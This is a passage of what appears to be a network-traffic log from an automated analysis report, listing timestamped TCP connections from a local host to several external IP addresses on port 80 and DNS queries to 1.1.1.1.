                                                                      Jan 13, 2025 15:13:17.652244091 CET4972780192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:17.657160997 CET8049727154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:17.658128977 CET4972780192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:17.671190977 CET4972780192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:17.676059961 CET8049727154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:18.240880013 CET8049727154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:18.241029978 CET8049727154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:18.241415024 CET4972780192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:19.180097103 CET4972780192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:20.198319912 CET4972880192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:20.203409910 CET8049728154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:20.208278894 CET4972880192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:20.219346046 CET4972880192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:20.224215031 CET8049728154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:20.224308014 CET8049728154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:20.807104111 CET8049728154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:20.807185888 CET8049728154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:20.807234049 CET4972880192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:21.727338076 CET4972880192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:22.750987053 CET4972980192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:22.755916119 CET8049729154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:22.755985022 CET4972980192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:22.768860102 CET4972980192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:22.773715973 CET8049729154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:23.336569071 CET8049729154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:23.336952925 CET8049729154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:23.337048054 CET4972980192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:23.339813948 CET4972980192.168.2.8154.197.162.239
                                                                      Jan 13, 2025 15:13:23.345499992 CET8049729154.197.162.239192.168.2.8
                                                                      Jan 13, 2025 15:13:28.489559889 CET4973080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:28.494473934 CET804973084.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:28.495349884 CET4973080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:28.510818958 CET4973080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:28.515788078 CET804973084.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:28.960227966 CET804973084.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:28.960302114 CET4973080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:30.024398088 CET4973080192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:30.029493093 CET804973084.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:31.042870998 CET4973180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:31.047909975 CET804973184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:31.048012018 CET4973180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:31.063648939 CET4973180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:31.068676949 CET804973184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:31.543752909 CET804973184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:31.543843031 CET4973180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:32.571286917 CET4973180192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:32.576141119 CET804973184.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:33.591233015 CET4973280192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:33.596251011 CET804973284.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:33.603240967 CET4973280192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:33.611244917 CET4973280192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:33.616053104 CET804973284.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:33.616205931 CET804973284.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:34.062084913 CET804973284.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:34.062236071 CET4973280192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:35.117630005 CET4973280192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:35.122725964 CET804973284.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.136015892 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.141133070 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.143321991 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.152900934 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.157915115 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621598959 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621623993 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621634007 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621709108 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621720076 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621732950 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621742964 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621753931 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621758938 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.621767044 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621779919 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621800900 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.621800900 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.621823072 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.621835947 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:36.621886015 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.625929117 CET4973380192.168.2.884.32.84.32
                                                                      Jan 13, 2025 15:13:36.630702972 CET804973384.32.84.32192.168.2.8
                                                                      Jan 13, 2025 15:13:42.495239019 CET4973480192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:42.500083923 CET8049734134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:42.507292032 CET4973480192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:42.519197941 CET4973480192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:42.524066925 CET8049734134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:43.444924116 CET8049734134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:43.444978952 CET8049734134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:43.445035934 CET4973480192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:44.027194023 CET4973480192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:45.043294907 CET4973580192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:45.048274040 CET8049735134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:45.048357964 CET4973580192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:45.068336964 CET4973580192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:45.073384047 CET8049735134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:46.013258934 CET8049735134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:46.013345957 CET8049735134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:46.013616085 CET4973580192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:46.571181059 CET4973580192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:47.589236975 CET4973680192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:47.594182014 CET8049736134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:47.594281912 CET4973680192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:47.606415987 CET4973680192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:47.611464024 CET8049736134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:47.611476898 CET8049736134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:48.566893101 CET8049736134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:48.566920996 CET8049736134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:48.567336082 CET4973680192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:49.117573977 CET4973680192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:50.138190985 CET4973780192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:50.145230055 CET8049737134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:50.150302887 CET4973780192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:50.161183119 CET4973780192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:50.168231010 CET8049737134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:51.067569971 CET8049737134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:51.067591906 CET8049737134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:51.067775965 CET4973780192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:51.076719999 CET4973780192.168.2.8134.122.135.48
                                                                      Jan 13, 2025 15:13:51.081615925 CET8049737134.122.135.48192.168.2.8
                                                                      Jan 13, 2025 15:13:56.111123085 CET4973880192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:56.116621971 CET804973847.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:13:56.116983891 CET4973880192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:56.131113052 CET4973880192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:56.136970043 CET804973847.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:13:57.643124104 CET4973880192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:57.648479939 CET804973847.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:13:57.655107975 CET4973880192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:58.652435064 CET4973980192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:58.658377886 CET804973947.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:13:58.658463955 CET4973980192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:58.674967051 CET4973980192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:13:58.679816008 CET804973947.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:00.275341988 CET804973947.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:00.275361061 CET804973947.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:00.279215097 CET4973980192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:00.346858025 CET4973980192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:01.355516911 CET4974080192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:01.360441923 CET804974047.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:01.360527039 CET4974080192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:01.378740072 CET4974080192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:01.383698940 CET804974047.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:01.383831978 CET804974047.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:02.901606083 CET4974080192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:02.906646013 CET804974047.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:02.906718016 CET4974080192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:03.917761087 CET4974180192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:03.922697067 CET804974147.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:03.923069954 CET4974180192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:03.930385113 CET4974180192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:03.935218096 CET804974147.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:05.589977026 CET804974147.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:05.590022087 CET804974147.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:05.590151072 CET4974180192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:05.593216896 CET4974180192.168.2.847.83.1.90
                                                                      Jan 13, 2025 15:14:05.598150015 CET804974147.83.1.90192.168.2.8
                                                                      Jan 13, 2025 15:14:10.633606911 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:10.638609886 CET8049742188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:10.639174938 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:10.651235104 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:10.656131029 CET8049742188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:11.180357933 CET8049742188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:11.180411100 CET8049742188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:11.180458069 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:11.180725098 CET8049742188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:11.180773020 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:12.164155960 CET4974280192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:13.183731079 CET4974380192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:13.192884922 CET8049743188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:13.192975998 CET4974380192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:13.210578918 CET4974380192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:13.219662905 CET8049743188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:13.785774946 CET8049743188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:13.785795927 CET8049743188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:13.786242008 CET8049743188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:13.790127039 CET4974380192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:14.726655006 CET4974380192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:15.747008085 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:15.752036095 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:15.752420902 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:15.770267010 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:15.775913954 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:15.776489019 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:16.279290915 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:16.279359102 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:16.279506922 CET8049744188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:16.279624939 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:16.279624939 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:17.273566008 CET4974480192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.295021057 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.299973011 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:18.300244093 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.310914993 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.315687895 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:18.811443090 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:18.811465979 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:18.811616898 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.811948061 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:18.811999083 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.814841032 CET4974580192.168.2.8188.114.96.3
                                                                      Jan 13, 2025 15:14:18.820164919 CET8049745188.114.96.3192.168.2.8
                                                                      Jan 13, 2025 15:14:32.032680988 CET4974680192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:32.037686110 CET8049746199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:32.037945986 CET4974680192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:32.060108900 CET4974680192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:32.065155983 CET8049746199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:32.502594948 CET8049746199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:32.502618074 CET8049746199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:32.502635002 CET8049746199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:32.502742052 CET4974680192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:33.570885897 CET4974680192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:34.589401960 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:34.594377995 CET8049747199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:34.594548941 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:34.614660978 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:34.620027065 CET8049747199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:35.068764925 CET8049747199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:35.068820000 CET8049747199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:35.068860054 CET8049747199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:35.068885088 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:35.068981886 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:36.118930101 CET4974780192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:37.137708902 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:37.142708063 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.142806053 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:37.162621975 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:37.167588949 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.167675972 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.603966951 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.604029894 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.604106903 CET8049748199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:37.604203939 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:37.604203939 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:38.664104939 CET4974880192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:39.683425903 CET4974980192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:39.688369036 CET8049749199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:39.688451052 CET4974980192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:39.696012020 CET4974980192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:39.700784922 CET8049749199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:40.163145065 CET8049749199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:40.163166046 CET8049749199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:40.163177967 CET8049749199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:40.163362026 CET4974980192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:40.165793896 CET4974980192.168.2.8199.59.243.228
                                                                      Jan 13, 2025 15:14:40.170670033 CET8049749199.59.243.228192.168.2.8
                                                                      Jan 13, 2025 15:14:45.216789007 CET4975080192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:45.221700907 CET804975013.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:45.221784115 CET4975080192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:45.242202044 CET4975080192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:45.246994972 CET804975013.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:46.757751942 CET4975080192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:46.805578947 CET804975013.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:47.777419090 CET4975180192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:47.782509089 CET804975113.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:47.789422035 CET4975180192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:47.801954985 CET4975180192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:47.806842089 CET804975113.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:48.829516888 CET804975013.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:48.829583883 CET4975080192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:49.304835081 CET4975180192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:49.310065031 CET804975113.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:49.310127974 CET4975180192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:50.322715998 CET4975280192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:50.327697039 CET804975213.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:50.330909014 CET4975280192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:50.345083952 CET4975280192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:50.349921942 CET804975213.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:50.350089073 CET804975213.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:51.283473969 CET804975213.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:51.335771084 CET4975280192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:51.853729010 CET4975280192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:52.871431112 CET4975380192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:52.876363993 CET804975313.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:52.876450062 CET4975380192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:52.888453007 CET4975380192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:52.893564939 CET804975313.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:53.830084085 CET804975313.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:53.914854050 CET4975380192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:54.712136030 CET804975313.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:14:54.715024948 CET4975380192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:54.718827963 CET4975380192.168.2.813.228.81.39
                                                                      Jan 13, 2025 15:14:54.723736048 CET804975313.228.81.39192.168.2.8
                                                                      Jan 13, 2025 15:15:00.818062067 CET4975480192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:00.822957039 CET8049754154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:00.823033094 CET4975480192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:00.843029022 CET4975480192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:00.848474026 CET8049754154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:02.353997946 CET4975480192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:02.401616096 CET8049754154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:03.370713949 CET4975580192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:03.375682116 CET8049755154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:03.375791073 CET4975580192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:03.392767906 CET4975580192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:03.397557974 CET8049755154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:04.898313046 CET4975580192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:04.945673943 CET8049755154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:05.917860031 CET4975680192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:05.922806978 CET8049756154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:05.927804947 CET4975680192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:05.942797899 CET4975680192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:05.947624922 CET8049756154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:05.947679996 CET8049756154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:07.445198059 CET4975680192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:07.497570992 CET8049756154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:08.464405060 CET4975780192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:08.469538927 CET8049757154.39.239.237192.168.2.8
                                                                      Jan 13, 2025 15:15:08.469640017 CET4975780192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:08.480974913 CET4975780192.168.2.8154.39.239.237
                                                                      Jan 13, 2025 15:15:08.485902071 CET8049757154.39.239.237192.168.2.8

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 13, 2025 15:12:03.461369038 CET5033953192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:12:03.479203939 CET53503391.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:12:20.172534943 CET5276753192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:12:20.227602959 CET53527671.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:12:33.340827942 CET5749053192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:12:33.355993032 CET53574901.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:12:46.706490040 CET5823253192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:12:47.711532116 CET5823253192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:12:47.743535995 CET53582321.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:12:47.743561029 CET53582321.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:13:01.366530895 CET5544353192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:13:01.381269932 CET53554431.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:13:14.746551037 CET5856453192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:13:15.101275921 CET53585641.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:13:28.436672926 CET5673553192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:13:28.484787941 CET53567351.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:13:41.639211893 CET5428353192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:13:42.488729000 CET53542831.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:13:56.089234114 CET5568553192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:13:56.107244015 CET53556851.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:14:10.605761051 CET5198053192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:14:10.629553080 CET53519801.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:14:23.826980114 CET5534553192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:14:23.835834026 CET53553451.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:14:31.903501987 CET5332953192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:14:32.023921967 CET53533291.1.1.1192.168.2.8
                                                                      Jan 13, 2025 15:14:45.184844971 CET5055353192.168.2.81.1.1.1
                                                                      Jan 13, 2025 15:14:45.213572979 CET53505531.1.1.1192.168.2.8
